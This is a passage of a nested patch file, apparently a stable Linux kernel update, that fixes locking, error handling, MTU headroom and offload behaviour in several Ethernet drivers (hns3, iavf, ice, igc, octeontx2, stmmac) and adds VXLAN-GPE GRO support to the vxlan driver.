+-	ret = hclge_ets_sch_mode_validate(hdev, ets, changed);
++	ret = hclge_ets_sch_mode_validate(hdev, ets, changed, tc_num);
+ 	if (ret)
+ 		return ret;
+ 
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_debugfs.c b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_debugfs.c
+index 0ebc21401b7c2..726062e512939 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_debugfs.c
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_debugfs.c
+@@ -692,8 +692,7 @@ static int hclge_dbg_dump_tc(struct hclge_dev *hdev, char *buf, int len)
+ 	for (i = 0; i < HNAE3_MAX_TC; i++) {
+ 		sch_mode_str = ets_weight->tc_weight[i] ? "dwrr" : "sp";
+ 		pos += scnprintf(buf + pos, len - pos, "%u     %4s    %3u\n",
+-				 i, sch_mode_str,
+-				 hdev->tm_info.pg_info[0].tc_dwrr[i]);
++				 i, sch_mode_str, ets_weight->tc_weight[i]);
+ 	}
+ 
+ 	return 0;
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_tm.c b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_tm.c
+index 922c0da3660c7..150f146fa24fb 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_tm.c
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_tm.c
+@@ -785,6 +785,7 @@ static void hclge_tm_tc_info_init(struct hclge_dev *hdev)
+ static void hclge_tm_pg_info_init(struct hclge_dev *hdev)
+ {
+ #define BW_PERCENT	100
++#define DEFAULT_BW_WEIGHT	1
+ 
+ 	u8 i;
+ 
+@@ -806,7 +807,7 @@ static void hclge_tm_pg_info_init(struct hclge_dev *hdev)
+ 		for (k = 0; k < hdev->tm_info.num_tc; k++)
+ 			hdev->tm_info.pg_info[i].tc_dwrr[k] = BW_PERCENT;
+ 		for (; k < HNAE3_MAX_TC; k++)
+-			hdev->tm_info.pg_info[i].tc_dwrr[k] = 0;
++			hdev->tm_info.pg_info[i].tc_dwrr[k] = DEFAULT_BW_WEIGHT;
+ 	}
+ }
+ 
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_debugfs.c b/drivers/net/ethernet/intel/i40e/i40e_debugfs.c
+index 9954493cd4489..62497f5565c59 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_debugfs.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_debugfs.c
+@@ -1839,7 +1839,7 @@ void i40e_dbg_pf_exit(struct i40e_pf *pf)
+ void i40e_dbg_init(void)
+ {
+ 	i40e_dbg_root = debugfs_create_dir(i40e_driver_name, NULL);
+-	if (!i40e_dbg_root)
++	if (IS_ERR(i40e_dbg_root))
+ 		pr_info("init of debugfs failed\n");
+ }
+ 
+diff --git a/drivers/net/ethernet/intel/iavf/iavf_main.c b/drivers/net/ethernet/intel/iavf/iavf_main.c
+index c1f91c55e1ca7..22bc57ee24228 100644
+--- a/drivers/net/ethernet/intel/iavf/iavf_main.c
++++ b/drivers/net/ethernet/intel/iavf/iavf_main.c
+@@ -3286,9 +3286,6 @@ static void iavf_adminq_task(struct work_struct *work)
+ 	u32 val, oldval;
+ 	u16 pending;
+ 
+-	if (adapter->flags & IAVF_FLAG_PF_COMMS_FAILED)
+-		goto out;
+-
+ 	if (!mutex_trylock(&adapter->crit_lock)) {
+ 		if (adapter->state == __IAVF_REMOVE)
+ 			return;
+@@ -3297,10 +3294,13 @@ static void iavf_adminq_task(struct work_struct *work)
+ 		goto out;
+ 	}
+ 
++	if (adapter->flags & IAVF_FLAG_PF_COMMS_FAILED)
++		goto unlock;
++
+ 	event.buf_len = IAVF_MAX_AQ_BUF_SIZE;
+ 	event.msg_buf = kzalloc(event.buf_len, GFP_KERNEL);
+ 	if (!event.msg_buf)
+-		goto out;
++		goto unlock;
+ 
+ 	do {
+ 		ret = iavf_clean_arq_element(hw, &event, &pending);
+@@ -3315,7 +3315,6 @@ static void iavf_adminq_task(struct work_struct *work)
+ 		if (pending != 0)
+ 			memset(event.msg_buf, 0, IAVF_MAX_AQ_BUF_SIZE);
+ 	} while (pending);
+-	mutex_unlock(&adapter->crit_lock);
+ 
+ 	if (iavf_is_reset_in_progress(adapter))
+ 		goto freedom;
+@@ -3359,6 +3358,8 @@ static void iavf_adminq_task(struct work_struct *work)
+ 
+ freedom:
+ 	kfree(event.msg_buf);
++unlock:
++	mutex_unlock(&adapter->crit_lock);
+ out:
+ 	/* re-enable Admin queue interrupt cause */
+ 	iavf_misc_irq_enable(adapter);
+diff --git a/drivers/net/ethernet/intel/ice/ice_ethtool_fdir.c b/drivers/net/ethernet/intel/ice/ice_ethtool_fdir.c
+index ead6d50fc0adc..8c6e13f87b7d3 100644
+--- a/drivers/net/ethernet/intel/ice/ice_ethtool_fdir.c
++++ b/drivers/net/ethernet/intel/ice/ice_ethtool_fdir.c
+@@ -1281,16 +1281,21 @@ ice_cfg_fdir_xtrct_seq(struct ice_pf *pf, struct ethtool_rx_flow_spec *fsp,
+ 				     ICE_FLOW_FLD_OFF_INVAL);
+ 	}
+ 
+-	/* add filter for outer headers */
+ 	fltr_idx = ice_ethtool_flow_to_fltr(fsp->flow_type & ~FLOW_EXT);
++
++	assign_bit(fltr_idx, hw->fdir_perfect_fltr, perfect_filter);
++
++	/* add filter for outer headers */
+ 	ret = ice_fdir_set_hw_fltr_rule(pf, seg, fltr_idx,
+ 					ICE_FD_HW_SEG_NON_TUN);
+-	if (ret == -EEXIST)
+-		/* Rule already exists, free memory and continue */
+-		devm_kfree(dev, seg);
+-	else if (ret)
++	if (ret == -EEXIST) {
++		/* Rule already exists, free memory and count as success */
++		ret = 0;
++		goto err_exit;
++	} else if (ret) {
+ 		/* could not write filter, free memory */
+ 		goto err_exit;
++	}
+ 
+ 	/* make tunneled filter HW entries if possible */
+ 	memcpy(&tun_seg[1], seg, sizeof(*seg));
+@@ -1305,18 +1310,13 @@ ice_cfg_fdir_xtrct_seq(struct ice_pf *pf, struct ethtool_rx_flow_spec *fsp,
+ 		devm_kfree(dev, tun_seg);
+ 	}
+ 
+-	if (perfect_filter)
+-		set_bit(fltr_idx, hw->fdir_perfect_fltr);
+-	else
+-		clear_bit(fltr_idx, hw->fdir_perfect_fltr);
+-
+ 	return ret;
+ 
+ err_exit:
+ 	devm_kfree(dev, tun_seg);
+ 	devm_kfree(dev, seg);
+ 
+-	return -EOPNOTSUPP;
++	return ret;
+ }
+ 
+ /**
+@@ -1914,7 +1914,9 @@ int ice_add_fdir_ethtool(struct ice_vsi *vsi, struct ethtool_rxnfc *cmd)
+ 	input->comp_report = ICE_FXD_FLTR_QW0_COMP_REPORT_SW_FAIL;
+ 
+ 	/* input struct is added to the HW filter list */
+-	ice_fdir_update_list_entry(pf, input, fsp->location);
++	ret = ice_fdir_update_list_entry(pf, input, fsp->location);
++	if (ret)
++		goto release_lock;
+ 
+ 	ret = ice_fdir_write_all_fltr(pf, input, true);
+ 	if (ret)
+diff --git a/drivers/net/ethernet/intel/igc/igc_main.c b/drivers/net/ethernet/intel/igc/igc_main.c
+index 2e091a4a065e7..d877dc0f87f71 100644
+--- a/drivers/net/ethernet/intel/igc/igc_main.c
++++ b/drivers/net/ethernet/intel/igc/igc_main.c
+@@ -317,6 +317,33 @@ static void igc_clean_all_tx_rings(struct igc_adapter *adapter)
+ 			igc_clean_tx_ring(adapter->tx_ring[i]);
+ }
+ 
++static void igc_disable_tx_ring_hw(struct igc_ring *ring)
++{
++	struct igc_hw *hw = &ring->q_vector->adapter->hw;
++	u8 idx = ring->reg_idx;
++	u32 txdctl;
++
++	txdctl = rd32(IGC_TXDCTL(idx));
++	txdctl &= ~IGC_TXDCTL_QUEUE_ENABLE;
++	txdctl |= IGC_TXDCTL_SWFLUSH;
++	wr32(IGC_TXDCTL(idx), txdctl);
++}
++
++/**
++ * igc_disable_all_tx_rings_hw - Disable all transmit queue operation
++ * @adapter: board private structure
++ */
++static void igc_disable_all_tx_rings_hw(struct igc_adapter *adapter)
++{
++	int i;
++
++	for (i = 0; i < adapter->num_tx_queues; i++) {
++		struct igc_ring *tx_ring = adapter->tx_ring[i];
++
++		igc_disable_tx_ring_hw(tx_ring);
++	}
++}
++
+ /**
+  * igc_setup_tx_resources - allocate Tx resources (Descriptors)
+  * @tx_ring: tx descriptor ring (for a specific queue) to setup
+@@ -5026,6 +5053,7 @@ void igc_down(struct igc_adapter *adapter)
+ 	/* clear VLAN promisc flag so VFTA will be updated if necessary */
+ 	adapter->flags &= ~IGC_FLAG_VLAN_PROMISC;
+ 
++	igc_disable_all_tx_rings_hw(adapter);
+ 	igc_clean_all_tx_rings(adapter);
+ 	igc_clean_all_rx_rings(adapter);
+ }
+@@ -7124,18 +7152,6 @@ void igc_enable_rx_ring(struct igc_ring *ring)
+ 		igc_alloc_rx_buffers(ring, igc_desc_unused(ring));
+ }
+ 
+-static void igc_disable_tx_ring_hw(struct igc_ring *ring)
+-{
+-	struct igc_hw *hw = &ring->q_vector->adapter->hw;
+-	u8 idx = ring->reg_idx;
+-	u32 txdctl;
+-
+-	txdctl = rd32(IGC_TXDCTL(idx));
+-	txdctl &= ~IGC_TXDCTL_QUEUE_ENABLE;
+-	txdctl |= IGC_TXDCTL_SWFLUSH;
+-	wr32(IGC_TXDCTL(idx), txdctl);
+-}
+-
+ void igc_disable_tx_ring(struct igc_ring *ring)
+ {
+ 	igc_disable_tx_ring_hw(ring);
+diff --git a/drivers/net/ethernet/intel/ixgbe/ixgbe_main.c b/drivers/net/ethernet/intel/ixgbe/ixgbe_main.c
+index 9b8848daeb430..6105419ae2d5f 100644
+--- a/drivers/net/ethernet/intel/ixgbe/ixgbe_main.c
++++ b/drivers/net/ethernet/intel/ixgbe/ixgbe_main.c
+@@ -8499,7 +8499,7 @@ static void ixgbe_atr(struct ixgbe_ring *ring,
+ 		struct ixgbe_adapter *adapter = q_vector->adapter;
+ 
+ 		if (unlikely(skb_tail_pointer(skb) < hdr.network +
+-			     VXLAN_HEADROOM))
++			     vxlan_headroom(0)))
+ 			return;
+ 
+ 		/* verify the port is recognized as VXLAN */
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_hash.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_hash.c
+index 3b0a66c0977a7..34fa59575fa91 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_hash.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_hash.c
+@@ -203,10 +203,8 @@ void npc_config_secret_key(struct rvu *rvu, int blkaddr)
+ 	struct rvu_hwinfo *hw = rvu->hw;
+ 	u8 intf;
+ 
+-	if (!hwcap->npc_hash_extract) {
+-		dev_info(rvu->dev, "HW does not support secret key configuration\n");
++	if (!hwcap->npc_hash_extract)
+ 		return;
+-	}
+ 
+ 	for (intf = 0; intf < hw->npc_intfs; intf++) {
+ 		rvu_write64(rvu, blkaddr, NPC_AF_INTFX_SECRET_KEY0(intf),
+@@ -220,15 +218,54 @@ void npc_config_secret_key(struct rvu *rvu, int blkaddr)
+ 
+ void npc_program_mkex_hash(struct rvu *rvu, int blkaddr)
+ {
++	struct npc_mcam_kex_hash *mh = rvu->kpu.mkex_hash;
+ 	struct hw_cap *hwcap = &rvu->hw->cap;
++	u8 intf, ld, hdr_offset, byte_len;
+ 	struct rvu_hwinfo *hw = rvu->hw;
+-	u8 intf;
++	u64 cfg;
+ 
+-	if (!hwcap->npc_hash_extract) {
+-		dev_dbg(rvu->dev, "Field hash extract feature is not supported\n");
++	/* Check if hardware supports hash extraction */
++	if (!hwcap->npc_hash_extract)
+ 		return;
++
++	/* Check if IPv6 source/destination address
++	 * should be hash enabled.
++	 * Hashing reduces 128bit SIP/DIP fields to 32bit
++	 * so that 224 bit X2 key can be used for IPv6 based filters as well,
++	 * which in turn results in more number of MCAM entries available for
++	 * use.
++	 *
++	 * Hashing of IPV6 SIP/DIP is enabled in below scenarios
++	 * 1. If the silicon variant supports hashing feature
++	 * 2. If the number of bytes of IP addr being extracted is 4 bytes ie
++	 *    32bit. The assumption here is that if user wants 8bytes of LSB of
++	 *    IP addr or full 16 bytes then his intention is not to use 32bit
++	 *    hash.
++	 */
++	for (intf = 0; intf < hw->npc_intfs; intf++) {
++		for (ld = 0; ld < NPC_MAX_LD; ld++) {
++			cfg = rvu_read64(rvu, blkaddr,
++					 NPC_AF_INTFX_LIDX_LTX_LDX_CFG(intf,
++								       NPC_LID_LC,
++								       NPC_LT_LC_IP6,
++								       ld));
++			hdr_offset = FIELD_GET(NPC_HDR_OFFSET, cfg);
++			byte_len = FIELD_GET(NPC_BYTESM, cfg);
++			/* Hashing of IPv6 source/destination address should be
++			 * enabled if,
++			 * hdr_offset == 8 (offset of source IPv6 address) or
++			 * hdr_offset == 24 (offset of destination IPv6)
++			 * address) and the number of byte to be
++			 * extracted is 4. As per hardware configuration
++			 * byte_len should be == actual byte_len - 1.
++			 * Hence byte_len is checked against 3 but nor 4.
++			 */
++			if ((hdr_offset == 8 || hdr_offset == 24) && byte_len == 3)
++				mh->lid_lt_ld_hash_en[intf][NPC_LID_LC][NPC_LT_LC_IP6][ld] = true;
++		}
+ 	}
+ 
++	/* Update hash configuration if the field is hash enabled */
+ 	for (intf = 0; intf < hw->npc_intfs; intf++) {
+ 		npc_program_mkex_hash_rx(rvu, blkaddr, intf);
+ 		npc_program_mkex_hash_tx(rvu, blkaddr, intf);
+@@ -1864,19 +1901,13 @@ int rvu_npc_exact_init(struct rvu *rvu)
+ 
+ 	/* Check exact match feature is supported */
+ 	npc_const3 = rvu_read64(rvu, blkaddr, NPC_AF_CONST3);
+-	if (!(npc_const3 & BIT_ULL(62))) {
+-		dev_info(rvu->dev, "%s: No support for exact match support\n",
+-			 __func__);
++	if (!(npc_const3 & BIT_ULL(62)))
+ 		return 0;
+-	}
+ 
+ 	/* Check if kex profile has enabled EXACT match nibble */
+ 	cfg = rvu_read64(rvu, blkaddr, NPC_AF_INTFX_KEX_CFG(NIX_INTF_RX));
+-	if (!(cfg & NPC_EXACT_NIBBLE_HIT)) {
+-		dev_info(rvu->dev, "%s: NPC exact match nibble not enabled in KEX profile\n",
+-			 __func__);
++	if (!(cfg & NPC_EXACT_NIBBLE_HIT))
+ 		return 0;
+-	}
+ 
+ 	/* Set capability to true */
+ 	rvu->hw->cap.npc_exact_match_enabled = true;
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_hash.h b/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_hash.h
+index a1c3d987b8044..57a09328d46b5 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_hash.h
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_hash.h
+@@ -70,8 +70,8 @@ static struct npc_mcam_kex_hash npc_mkex_hash_default __maybe_unused = {
+ 	[NIX_INTF_RX] = {
+ 		[NPC_LID_LC] = {
+ 			[NPC_LT_LC_IP6] = {
+-				true,
+-				true,
++				false,
++				false,
+ 			},
+ 		},
+ 	},
+@@ -79,8 +79,8 @@ static struct npc_mcam_kex_hash npc_mkex_hash_default __maybe_unused = {
+ 	[NIX_INTF_TX] = {
+ 		[NPC_LID_LC] = {
+ 			[NPC_LT_LC_IP6] = {
+-				true,
+-				true,
++				false,
++				false,
+ 			},
+ 		},
+ 	},
+diff --git a/drivers/net/ethernet/stmicro/stmmac/dwmac4_lib.c b/drivers/net/ethernet/stmicro/stmmac/dwmac4_lib.c
+index d1c605777985f..7c26394f665e4 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/dwmac4_lib.c
++++ b/drivers/net/ethernet/stmicro/stmmac/dwmac4_lib.c
+@@ -207,13 +207,15 @@ void stmmac_dwmac4_set_mac_addr(void __iomem *ioaddr, const u8 addr[6],
+ void stmmac_dwmac4_set_mac(void __iomem *ioaddr, bool enable)
+ {
+ 	u32 value = readl(ioaddr + GMAC_CONFIG);
++	u32 old_val = value;
+ 
+ 	if (enable)
+ 		value |= GMAC_CONFIG_RE | GMAC_CONFIG_TE;
+ 	else
+ 		value &= ~(GMAC_CONFIG_TE | GMAC_CONFIG_RE);
+ 
+-	writel(value, ioaddr + GMAC_CONFIG);
++	if (value != old_val)
++		writel(value, ioaddr + GMAC_CONFIG);
+ }
+ 
+ void stmmac_dwmac4_get_mac_addr(void __iomem *ioaddr, unsigned char *addr,
+diff --git a/drivers/net/phy/marvell10g.c b/drivers/net/phy/marvell10g.c
+index 383a9c9f36e54..057d294a273d8 100644
+--- a/drivers/net/phy/marvell10g.c
++++ b/drivers/net/phy/marvell10g.c
+@@ -328,6 +328,13 @@ static int mv3310_power_up(struct phy_device *phydev)
+ 	ret = phy_clear_bits_mmd(phydev, MDIO_MMD_VEND2, MV_V2_PORT_CTRL,
+ 				 MV_V2_PORT_CTRL_PWRDOWN);
+ 
++	/* Sometimes, the power down bit doesn't clear immediately, and
++	 * a read of this register causes the bit not to clear. Delay
++	 * 100us to allow the PHY to come out of power down mode before
++	 * the next access.
++	 */
++	udelay(100);
++
+ 	if (phydev->drv->phy_id != MARVELL_PHY_ID_88X3310 ||
+ 	    priv->firmware_ver < 0x00030000)
+ 		return ret;
+diff --git a/drivers/net/team/team.c b/drivers/net/team/team.c
+index b524bd374d685..509ba706781ed 100644
+--- a/drivers/net/team/team.c
++++ b/drivers/net/team/team.c
+@@ -2135,6 +2135,15 @@ static void team_setup_by_port(struct net_device *dev,
+ 	dev->mtu = port_dev->mtu;
+ 	memcpy(dev->broadcast, port_dev->broadcast, port_dev->addr_len);
+ 	eth_hw_addr_inherit(dev, port_dev);
++
++	if (port_dev->flags & IFF_POINTOPOINT) {
++		dev->flags &= ~(IFF_BROADCAST | IFF_MULTICAST);
++		dev->flags |= (IFF_POINTOPOINT | IFF_NOARP);
++	} else if ((port_dev->flags & (IFF_BROADCAST | IFF_MULTICAST)) ==
++		    (IFF_BROADCAST | IFF_MULTICAST)) {
++		dev->flags |= (IFF_BROADCAST | IFF_MULTICAST);
++		dev->flags &= ~(IFF_POINTOPOINT | IFF_NOARP);
++	}
+ }
+ 
+ static int team_dev_type_check_change(struct net_device *dev,
+diff --git a/drivers/net/virtio_net.c b/drivers/net/virtio_net.c
+index fae302c5b0a91..075d5d42f5eb6 100644
+--- a/drivers/net/virtio_net.c
++++ b/drivers/net/virtio_net.c
+@@ -3940,6 +3940,8 @@ static int virtnet_probe(struct virtio_device *vdev)
+ 	if (vi->has_rss || vi->has_rss_hash_report)
+ 		virtnet_init_default_rss(vi);
+ 
++	_virtnet_set_queues(vi, vi->curr_queue_pairs);
++
+ 	/* serialize netdev register + virtio_device_ready() with ndo_open() */
+ 	rtnl_lock();
+ 
+@@ -3960,8 +3962,6 @@ static int virtnet_probe(struct virtio_device *vdev)
+ 		goto free_unregister_netdev;
+ 	}
+ 
+-	virtnet_set_queues(vi, vi->curr_queue_pairs);
+-
+ 	/* Assume link up if device can't report link status,
+ 	   otherwise get link status from config. */
+ 	netif_carrier_off(dev);
+diff --git a/drivers/net/vxlan/vxlan_core.c b/drivers/net/vxlan/vxlan_core.c
+index d4be39b19a6be..0c3eb850fcb79 100644
+--- a/drivers/net/vxlan/vxlan_core.c
++++ b/drivers/net/vxlan/vxlan_core.c
+@@ -670,6 +670,32 @@ static int vxlan_fdb_append(struct vxlan_fdb *f,
+ 	return 1;
+ }
+ 
++static bool vxlan_parse_gpe_proto(struct vxlanhdr *hdr, __be16 *protocol)
++{
++	struct vxlanhdr_gpe *gpe = (struct vxlanhdr_gpe *)hdr;
++
++	/* Need to have Next Protocol set for interfaces in GPE mode. */
++	if (!gpe->np_applied)
++		return false;
++	/* "The initial version is 0. If a receiver does not support the
++	 * version indicated it MUST drop the packet.
++	 */
++	if (gpe->version != 0)
++		return false;
++	/* "When the O bit is set to 1, the packet is an OAM packet and OAM
++	 * processing MUST occur." However, we don't implement OAM
++	 * processing, thus drop the packet.
++	 */
++	if (gpe->oam_flag)
++		return false;
++
++	*protocol = tun_p_to_eth_p(gpe->next_protocol);
++	if (!*protocol)
++		return false;
++
++	return true;
++}
++
+ static struct vxlanhdr *vxlan_gro_remcsum(struct sk_buff *skb,
+ 					  unsigned int off,
+ 					  struct vxlanhdr *vh, size_t hdrlen,
+@@ -696,26 +722,24 @@ static struct vxlanhdr *vxlan_gro_remcsum(struct sk_buff *skb,
+ 	return vh;
+ }
+ 
+-static struct sk_buff *vxlan_gro_receive(struct sock *sk,
+-					 struct list_head *head,
+-					 struct sk_buff *skb)
++static struct vxlanhdr *vxlan_gro_prepare_receive(struct sock *sk,
++						  struct list_head *head,
++						  struct sk_buff *skb,
++						  struct gro_remcsum *grc)
+ {
+-	struct sk_buff *pp = NULL;
+ 	struct sk_buff *p;
+ 	struct vxlanhdr *vh, *vh2;
+ 	unsigned int hlen, off_vx;
+-	int flush = 1;
+ 	struct vxlan_sock *vs = rcu_dereference_sk_user_data(sk);
+ 	__be32 flags;
+-	struct gro_remcsum grc;
+ 
+-	skb_gro_remcsum_init(&grc);
++	skb_gro_remcsum_init(grc);
+ 
+ 	off_vx = skb_gro_offset(skb);
+ 	hlen = off_vx + sizeof(*vh);
+ 	vh = skb_gro_header(skb, hlen, off_vx);
+ 	if (unlikely(!vh))
+-		goto out;
++		return NULL;
+ 
+ 	skb_gro_postpull_rcsum(skb, vh, sizeof(struct vxlanhdr));
+ 
+@@ -723,12 +747,12 @@ static struct sk_buff *vxlan_gro_receive(struct sock *sk,
+ 
+ 	if ((flags & VXLAN_HF_RCO) && (vs->flags & VXLAN_F_REMCSUM_RX)) {
+ 		vh = vxlan_gro_remcsum(skb, off_vx, vh, sizeof(struct vxlanhdr),
+-				       vh->vx_vni, &grc,
++				       vh->vx_vni, grc,
+ 				       !!(vs->flags &
+ 					  VXLAN_F_REMCSUM_NOPARTIAL));
+ 
+ 		if (!vh)
+-			goto out;
++			return NULL;
+ 	}
+ 
+ 	skb_gro_pull(skb, sizeof(struct vxlanhdr)); /* pull vxlan header */
+@@ -745,12 +769,48 @@ static struct sk_buff *vxlan_gro_receive(struct sock *sk,
+ 		}
+ 	}
+ 
+-	pp = call_gro_receive(eth_gro_receive, head, skb);
+-	flush = 0;
++	return vh;
++}
+ 
+-out:
++static struct sk_buff *vxlan_gro_receive(struct sock *sk,
++					 struct list_head *head,
++					 struct sk_buff *skb)
++{
++	struct sk_buff *pp = NULL;
++	struct gro_remcsum grc;
++	int flush = 1;
++
++	if (vxlan_gro_prepare_receive(sk, head, skb, &grc)) {
++		pp = call_gro_receive(eth_gro_receive, head, skb);
++		flush = 0;
++	}
+ 	skb_gro_flush_final_remcsum(skb, pp, flush, &grc);
++	return pp;
++}
++
++static struct sk_buff *vxlan_gpe_gro_receive(struct sock *sk,
++					     struct list_head *head,
++					     struct sk_buff *skb)
++{
++	const struct packet_offload *ptype;
++	struct sk_buff *pp = NULL;
++	struct gro_remcsum grc;
++	struct vxlanhdr *vh;
++	__be16 protocol;
++	int flush = 1;
+ 
++	vh = vxlan_gro_prepare_receive(sk, head, skb, &grc);
++	if (vh) {
++		if (!vxlan_parse_gpe_proto(vh, &protocol))
++			goto out;
++		ptype = gro_find_receive_by_type(protocol);
++		if (!ptype)
++			goto out;
++		pp = call_gro_receive(ptype->callbacks.gro_receive, head, skb);
++		flush = 0;
++	}
++out:
++	skb_gro_flush_final_remcsum(skb, pp, flush, &grc);
+ 	return pp;
+ }
+ 
+@@ -762,6 +822,21 @@ static int vxlan_gro_complete(struct sock *sk, struct sk_buff *skb, int nhoff)
+ 	return eth_gro_complete(skb, nhoff + sizeof(struct vxlanhdr));
+ }
+ 
++static int vxlan_gpe_gro_complete(struct sock *sk, struct sk_buff *skb, int nhoff)
++{
++	struct vxlanhdr *vh = (struct vxlanhdr *)(skb->data + nhoff);
++	const struct packet_offload *ptype;
++	int err = -ENOSYS;
++	__be16 protocol;
++
++	if (!vxlan_parse_gpe_proto(vh, &protocol))
++		return err;
++	ptype = gro_find_complete_by_type(protocol);
++	if (ptype)
++		err = ptype->callbacks.gro_complete(skb, nhoff + sizeof(struct vxlanhdr));
++	return err;
++}
++
+ static struct vxlan_fdb *vxlan_fdb_alloc(struct vxlan_dev *vxlan, const u8 *mac,
+ 					 __u16 state, __be32 src_vni,
+ 					 __u16 ndm_flags)
+@@ -1572,35 +1647,6 @@ out:
+ 	unparsed->vx_flags &= ~VXLAN_GBP_USED_BITS;
+ }
+ 
+-static bool vxlan_parse_gpe_hdr(struct vxlanhdr *unparsed,
+-				__be16 *protocol,
+-				struct sk_buff *skb, u32 vxflags)
+-{
+-	struct vxlanhdr_gpe *gpe = (struct vxlanhdr_gpe *)unparsed;
+-
+-	/* Need to have Next Protocol set for interfaces in GPE mode. */
+-	if (!gpe->np_applied)
+-		return false;
+-	/* "The initial version is 0. If a receiver does not support the
+-	 * version indicated it MUST drop the packet.
+-	 */
+-	if (gpe->version != 0)
+-		return false;
+-	/* "When the O bit is set to 1, the packet is an OAM packet and OAM
+-	 * processing MUST occur." However, we don't implement OAM
+-	 * processing, thus drop the packet.
+-	 */
+-	if (gpe->oam_flag)
+-		return false;
+-
+-	*protocol = tun_p_to_eth_p(gpe->next_protocol);
+-	if (!*protocol)
+-		return false;
+-
+-	unparsed->vx_flags &= ~VXLAN_GPE_USED_BITS;
+-	return true;
+-}
+-
+ static bool vxlan_set_mac(struct vxlan_dev *vxlan,
+ 			  struct vxlan_sock *vs,
+ 			  struct sk_buff *skb, __be32 vni)
+@@ -1702,8 +1748,9 @@ static int vxlan_rcv(struct sock *sk, struct sk_buff *skb)
+ 	 * used by VXLAN extensions if explicitly requested.
+ 	 */
+ 	if (vs->flags & VXLAN_F_GPE) {
+-		if (!vxlan_parse_gpe_hdr(&unparsed, &protocol, skb, vs->flags))
++		if (!vxlan_parse_gpe_proto(&unparsed, &protocol))
+ 			goto drop;
++		unparsed.vx_flags &= ~VXLAN_GPE_USED_BITS;
+ 		raw_proto = true;
+ 	}
+ 
+@@ -2584,7 +2631,7 @@ static void vxlan_xmit_one(struct sk_buff *skb, struct net_device *dev,
+ 		}
+ 
+ 		ndst = &rt->dst;
+-		err = skb_tunnel_check_pmtu(skb, ndst, VXLAN_HEADROOM,
++		err = skb_tunnel_check_pmtu(skb, ndst, vxlan_headroom(flags & VXLAN_F_GPE),
+ 					    netif_is_any_bridge_port(dev));
+ 		if (err < 0) {
+ 			goto tx_error;
+@@ -2645,7 +2692,8 @@ static void vxlan_xmit_one(struct sk_buff *skb, struct net_device *dev,
+ 				goto out_unlock;
+ 		}
+ 
+-		err = skb_tunnel_check_pmtu(skb, ndst, VXLAN6_HEADROOM,
++		err = skb_tunnel_check_pmtu(skb, ndst,
++					    vxlan_headroom((flags & VXLAN_F_GPE) | VXLAN_F_IPV6),
+ 					    netif_is_any_bridge_port(dev));
+ 		if (err < 0) {
+ 			goto tx_error;
+@@ -3034,14 +3082,12 @@ static int vxlan_change_mtu(struct net_device *dev, int new_mtu)
+ 	struct vxlan_rdst *dst = &vxlan->default_dst;
+ 	struct net_device *lowerdev = __dev_get_by_index(vxlan->net,
+ 							 dst->remote_ifindex);
+-	bool use_ipv6 = !!(vxlan->cfg.flags & VXLAN_F_IPV6);
+ 
+ 	/* This check is different than dev->max_mtu, because it looks at
+ 	 * the lowerdev->mtu, rather than the static dev->max_mtu
+ 	 */
+ 	if (lowerdev) {
+-		int max_mtu = lowerdev->mtu -
+-			      (use_ipv6 ? VXLAN6_HEADROOM : VXLAN_HEADROOM);
++		int max_mtu = lowerdev->mtu - vxlan_headroom(vxlan->cfg.flags);
+ 		if (new_mtu > max_mtu)
+ 			return -EINVAL;
+ 	}
+@@ -3419,8 +3465,13 @@ static struct vxlan_sock *vxlan_socket_create(struct net *net, bool ipv6,
+ 	tunnel_cfg.encap_rcv = vxlan_rcv;
+ 	tunnel_cfg.encap_err_lookup = vxlan_err_lookup;
+ 	tunnel_cfg.encap_destroy = NULL;
+-	tunnel_cfg.gro_receive = vxlan_gro_receive;
+-	tunnel_cfg.gro_complete = vxlan_gro_complete;
++	if (vs->flags & VXLAN_F_GPE) {
++		tunnel_cfg.gro_receive = vxlan_gpe_gro_receive;
++		tunnel_cfg.gro_complete = vxlan_gpe_gro_complete;
++	} else {
++		tunnel_cfg.gro_receive = vxlan_gro_receive;
++		tunnel_cfg.gro_complete = vxlan_gro_complete;
++	}
+ 
+ 	setup_udp_tunnel_sock(net, sock, &tunnel_cfg);
+ 
+@@ -3684,11 +3735,11 @@ static void vxlan_config_apply(struct net_device *dev,
+ 	struct vxlan_dev *vxlan = netdev_priv(dev);
+ 	struct vxlan_rdst *dst = &vxlan->default_dst;
+ 	unsigned short needed_headroom = ETH_HLEN;
+-	bool use_ipv6 = !!(conf->flags & VXLAN_F_IPV6);
+ 	int max_mtu = ETH_MAX_MTU;
++	u32 flags = conf->flags;
+ 
+ 	if (!changelink) {
+-		if (conf->flags & VXLAN_F_GPE)
++		if (flags & VXLAN_F_GPE)
+ 			vxlan_raw_setup(dev);
+ 		else
+ 			vxlan_ether_setup(dev);
+@@ -3713,8 +3764,7 @@ static void vxlan_config_apply(struct net_device *dev,
+ 
+ 		dev->needed_tailroom = lowerdev->needed_tailroom;
+ 
+-		max_mtu = lowerdev->mtu - (use_ipv6 ? VXLAN6_HEADROOM :
+-					   VXLAN_HEADROOM);
++		max_mtu = lowerdev->mtu - vxlan_headroom(flags);
+ 		if (max_mtu < ETH_MIN_MTU)
+ 			max_mtu = ETH_MIN_MTU;
+ 
+@@ -3725,10 +3775,9 @@ static void vxlan_config_apply(struct net_device *dev,
+ 	if (dev->mtu > max_mtu)
+ 		dev->mtu = max_mtu;
